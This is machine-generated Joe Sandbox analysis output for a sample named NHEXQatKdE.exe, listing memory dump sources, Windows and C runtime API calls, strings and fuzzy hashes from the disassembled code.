                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                      • Opcode ID: 68d4693024a65422dcc705b3454e9d525d437dd8ed1908ea9de33c9dbf37690c
                                                                                                                                      • Instruction ID: 984ea888b0428a3e9bcc80e2679b4d7d5a150ffb43ea584657bf61ac231781df
                                                                                                                                      • Opcode Fuzzy Hash: 68d4693024a65422dcc705b3454e9d525d437dd8ed1908ea9de33c9dbf37690c
                                                                                                                                      • Instruction Fuzzy Hash: ACF062B4D1020DEBCB00DBF4DA499AEBBF6EF1C201BA15596A412E7110EB34AB44DB51
                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,006E1A21), ref: 006E6412
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,006E1A21), ref: 006E641C
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(006E14DF,?,?,?,?,?,006E1A21), ref: 006E6429
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                      • Opcode ID: b15b73b7e503de26987f962e90688062960e56d7db208bd3df6731cb131d9b5b
                                                                                                                                      • Instruction ID: e556bc0c69dbde2fb2a39c5d3b9690f1742e9e0840afb99ff4865540f03e0d93
                                                                                                                                      • Opcode Fuzzy Hash: b15b73b7e503de26987f962e90688062960e56d7db208bd3df6731cb131d9b5b
                                                                                                                                      • Instruction Fuzzy Hash: 4531F274902328DBCB21DF69D9897DCBBB9BF18310F5051EAE41CA72A0E7709B858F45
                                                                                                                                      APIs
                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,006F3C79,?,?,00000008,?,?,006F384B,00000000), ref: 006F3F4B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                      • Opcode ID: f7a9c8d6280199ec4f4ddfdc52980ff80ba7c4dba2423299144187cf454a3db9
                                                                                                                                      • Instruction ID: 4d067a2049b9904bd807423b84c6048dbf9f2e9623ac78807564adadc0cee0a6
                                                                                                                                      • Opcode Fuzzy Hash: f7a9c8d6280199ec4f4ddfdc52980ff80ba7c4dba2423299144187cf454a3db9
                                                                                                                                      • Instruction Fuzzy Hash: 9DB16C31610618DFD715CF28C48ABA57BE2FF05364F258659EA99CF3A1C735EA82CB40
                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006E245B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                      • Opcode ID: 3016676e2203229e08370d8e981be081574d36050de96d6897a5ee537d3bdd8a
                                                                                                                                      • Instruction ID: 41595d97e3fd5a30f40d0cb7f04231e52ef3b9e18e1bbadef861a3ac8a506b6a
                                                                                                                                      • Opcode Fuzzy Hash: 3016676e2203229e08370d8e981be081574d36050de96d6897a5ee537d3bdd8a
                                                                                                                                      • Instruction Fuzzy Hash: C4A1ADB19067498FDB18CF59DA916BDBBB7FB48324F24A52AD401EB361D3349940CF90
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 006E8BB5: HeapAlloc.KERNEL32(00000008,?,006E1A21,?,006E743C,00000001,00000364,006E1A21,00000006,000000FF,?,006E29D3,006E1809,006E1807,?,?), ref: 006E8BF6
                                                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006EB2CB
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 006EB3BF
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 006EB3FE
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 006EB431
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2701053895-0
                                                                                                                                      • Opcode ID: 8ea5303ec4bccc8d9604f5b8ce6dda7ab835b6f8cf8d77fbb570e501ee426667
                                                                                                                                      • Instruction ID: 1a82c830cb53860e62c538e32b9119e278bb5f081ddc757fe3c1752a7b572e7e
                                                                                                                                      • Opcode Fuzzy Hash: 8ea5303ec4bccc8d9604f5b8ce6dda7ab835b6f8cf8d77fbb570e501ee426667
                                                                                                                                      • Instruction Fuzzy Hash: D5518672906388AFDB249FAA9C959FFB7ABDF45314F1451ACF40897301EB308E418B24
                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000234C,006E1CDF), ref: 006E2230
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      • Opcode ID: 797c34072a4f6512442c08d25a08f0a4b06aad51f309fe852140c18fa9aa7544
                                                                                                                                      • Instruction ID: 8f403f087444a6e42a3d347f3b1ccd6907a753fe6737864962e5f2d637118ac7
                                                                                                                                      • Opcode Fuzzy Hash: 797c34072a4f6512442c08d25a08f0a4b06aad51f309fe852140c18fa9aa7544
                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HeapProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                      • Opcode ID: 34469ab8b71bd0b4856f49f351ba2f4621237bb7f186874dcfdf3275d27ad0ef
                                                                                                                                      • Instruction ID: 81220c3b90a2c3f154de431906f6ff5c90348576aa78d1b1ad15cf217e0344b6
                                                                                                                                      • Opcode Fuzzy Hash: 34469ab8b71bd0b4856f49f351ba2f4621237bb7f186874dcfdf3275d27ad0ef
                                                                                                                                      • Instruction Fuzzy Hash: 67A001B06012418B9B449F76AA0922D3AABAE596D6705E06AA409C9664EA249450DF06
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b84f89a2059a45267400b08470fbba7c47bd04afd03262b2db388cf3539e612d
                                                                                                                                      • Instruction ID: aa125c459f3c6f201bd8085db8c198991301b0ef569c359122c7503085218ee1
                                                                                                                                      • Opcode Fuzzy Hash: b84f89a2059a45267400b08470fbba7c47bd04afd03262b2db388cf3539e612d
                                                                                                                                      • Instruction Fuzzy Hash: 1DB1C17090278A8FCF28CE7B89556FEB7A3AF54300F14061DEA6297781CF319A46CB51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5f0e134041470e9fe284de6385fc1cd4d990d422bbc9f06d2e93a1de301e933c
                                                                                                                                      • Instruction ID: fafffc52131bc0c6a32f2bae601e28835afb426949851bfdb9a5f9b7c0db6281
                                                                                                                                      • Opcode Fuzzy Hash: 5f0e134041470e9fe284de6385fc1cd4d990d422bbc9f06d2e93a1de301e933c
                                                                                                                                      • Instruction Fuzzy Hash: C8118E323146A007576C9E299CE503B7B57D7C7194324517EC4228F7D2E933CC83D294
                                                                                                                                      APIs
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 006E2B17
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 006E2B1F
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 006E2BA8
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 006E2BD3
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 006E2C28
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                      • String ID: csm$'n
                                                                                                                                      • API String ID: 1170836740-47889775
                                                                                                                                      • Opcode ID: 358801c20e361bee26f45e47be5fca48f528460eab6f4ba4226f3c3b2831525b
                                                                                                                                      • Instruction ID: 8e8e9df1c27d2be6221e041fca207c97ac235937fe9b72dabb81b83859a72b67
                                                                                                                                      • Opcode Fuzzy Hash: 358801c20e361bee26f45e47be5fca48f528460eab6f4ba4226f3c3b2831525b
                                                                                                                                      • Instruction Fuzzy Hash: 5041E734A0134A9BCF10DF6AC890AAE7BBBFF44328F148159E9159B352D7319A01CB90
                                                                                                                                      APIs
                                                                                                                                      • GetCPInfo.KERNEL32(00DE2430,00DE2430,00000000,7FFFFFFF,?,006F267D,00DE2430,00DE2430,00000000,00DE2430,?,?,?,?,00DE2430,00000000), ref: 006F2738
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 006F27F3
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 006F2882
                                                                                                                                      • __freea.LIBCMT ref: 006F28CD
                                                                                                                                      • __freea.LIBCMT ref: 006F28D3
                                                                                                                                      • __freea.LIBCMT ref: 006F2909
                                                                                                                                      • __freea.LIBCMT ref: 006F290F
                                                                                                                                      • __freea.LIBCMT ref: 006F291F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 127012223-0
                                                                                                                                      • Opcode ID: bce732489ab1408dedead99c5a4587ee52ddc287695a15e5433a8f49951034b8
                                                                                                                                      • Instruction ID: 35fb939eacbd42ddf476261ebab43298436a9426668e9a0434b03d9d6225f535
                                                                                                                                      • Opcode Fuzzy Hash: bce732489ab1408dedead99c5a4587ee52ddc287695a15e5433a8f49951034b8
                                                                                                                                      • Instruction Fuzzy Hash: E171167290124FABDF21AF95CC61BFE77BBAF45350F280059EA14AB382D6709C448F65
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strrchr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                      • Opcode ID: 3825fff6bd7fd7d33fbd87751acabf464b2013d176b50613b12fd40d88381faf
                                                                                                                                      • Instruction ID: 943c52e830fa96b2c655e3949755090598e1b225c93fda49e5ff099aac8e6bb6
                                                                                                                                      • Opcode Fuzzy Hash: 3825fff6bd7fd7d33fbd87751acabf464b2013d176b50613b12fd40d88381faf
                                                                                                                                      • Instruction Fuzzy Hash: 26B11772A023D5AFDF118F26CC81BEE7BA6EF56310F184569E904AF382D2749905C7B4
                                                                                                                                      APIs
                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 006F0495
                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 006F070E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                      • String ID: HQo$csm$csm$csm
                                                                                                                                      • API String ID: 2673424686-3405988832
                                                                                                                                      • Opcode ID: 01f810fc2b6242933f29e88043c091f7b7991e27848a889f5474da80c6d8ae92
                                                                                                                                      • Instruction ID: 7d3d1a6ed121e1949a330bea2702b6a675342a1b68507622fbaa90a569fdebfc
                                                                                                                                      • Opcode Fuzzy Hash: 01f810fc2b6242933f29e88043c091f7b7991e27848a889f5474da80c6d8ae92
                                                                                                                                      • Instruction Fuzzy Hash: AEB17A7180120DEFDF14DFA5C9819AEBBB6BF54300B14455EFA05AB252C730EA61CFA5
                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,006E689E,006E28C9,006E2390), ref: 006E68B5
                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006E68C3
                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006E68DC
                                                                                                                                      • SetLastError.KERNEL32(00000000,006E689E,006E28C9,006E2390), ref: 006E692E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                      • Opcode ID: c2597989f57cc474330d0ddd73f7bd5de985a5f97e2b3463f704b1e2b0a9efab
                                                                                                                                      • Instruction ID: 450dd46ddda72eb35976a2080b94fc858bec7232ff5587f4270e9c1c97782a02
                                                                                                                                      • Opcode Fuzzy Hash: c2597989f57cc474330d0ddd73f7bd5de985a5f97e2b3463f704b1e2b0a9efab
                                                                                                                                      • Instruction Fuzzy Hash: AC01D87210B3525EE76427BBFDD68772B97EB217F5320122DF114412E2EF214C22D5A5
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user\Desktop\NHEXQatKdE.exe, xrefs: 006EB570
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
